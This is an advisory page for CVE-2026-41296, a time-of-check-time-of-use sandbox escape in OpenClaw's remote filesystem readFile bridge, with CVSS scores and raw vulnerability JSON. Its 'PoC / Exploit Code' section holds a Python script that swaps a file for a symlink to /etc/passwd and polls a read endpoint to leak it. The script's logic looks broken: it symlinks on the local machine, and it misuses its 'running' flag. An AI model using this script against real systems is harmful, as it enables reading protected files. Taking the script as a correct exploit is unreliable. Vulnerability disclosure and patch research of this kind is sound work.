Security Vulnerability Report
中文
CVE-2026-41296 CVSS 8.2 HIGH

CVE-2026-41296

Published: 2026-04-21 00:16:30
Last Modified: 2026-04-27 15:06:33
Source: [email protected]

Description

OpenClaw before 2026.3.31 contains a time-of-check-time-of-use race condition in the remote filesystem bridge readFile function that allows sandbox escape. Attackers can exploit the separate path validation and file read operations to bypass sandbox restrictions and read arbitrary files.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import threading import os import time import requests # Target file to read (e.g., /etc/passwd) TARGET_FILE = "/etc/passwd" # Allowed path in the sandbox SANDBOX_FILE = "/tmp/safe_file.txt" # Flag to control threads running = True def exploit_race_condition(): """ Simulates the TOCTOU attack. Switches files rapidly in two threads to hit the race window between 'Check' and 'Use'. """ while running: try: # Step 1: Create a legitimate file to pass the initial check with open(SANDBOX_FILE, 'w') as f: f.write("safe content") # Step 2: Immediately swap it with a symlink to the target file # This must happen between the server's path validation and file read os.remove(SANDBOX_FILE) os.symlink(TARGET_FILE, SANDBOX_FILE) # Step 3: Trigger the vulnerable readFile function via HTTP request # Replace URL with the actual vulnerable endpoint response = requests.get("http://vulnerable-host:8080/api/read?file=" + SANDBOX_FILE) # Check if we successfully read the target file if "root:" in response.text: print("[+] Exploit successful! Sensitive data leaked:") print(response.text) running = False break except Exception as e: # Clean up and retry pass finally: # Clean up symlink for the next iteration if os.path.islink(SANDBOX_FILE): os.remove(SANDBOX_FILE) # Start the exploit in a separate thread attacker_thread = threading.Thread(target=exploit_race_condition) attacker_thread.start() # Run for a specific duration time.sleep(10) running = False attacker_thread.join()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41296", "sourceIdentifier": "[email protected]", "published": "2026-04-21T00:16:29.993", "lastModified": "2026-04-27T15:06:33.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.31 contains a time-of-check-time-of-use race condition in the remote filesystem bridge readFile function that allows sandbox escape. Attackers can exploit the separate path validation and file read operations to bypass sandbox restrictions and read arbitrary files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.31", "matchCriteriaId": "35B1FB5C-EA5A-4095-9226-F947A9B3B984"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/121870a08583033ed6a0ed73d9ffea32991252bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p3r-hh9g-5cmg", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-toctou-race-in-remote-fs-bridge-readfile", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.